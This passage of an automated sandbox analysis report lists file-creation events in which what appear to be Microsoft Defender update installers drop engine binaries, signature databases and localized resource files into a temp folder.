Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\is-IS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\km-KH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\or-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ka-GE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gu-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mi-NZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCommu.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ms-MY\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ta-IN\mpuxagent.dll.mui Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gl-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ug-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lb-LU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\te-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
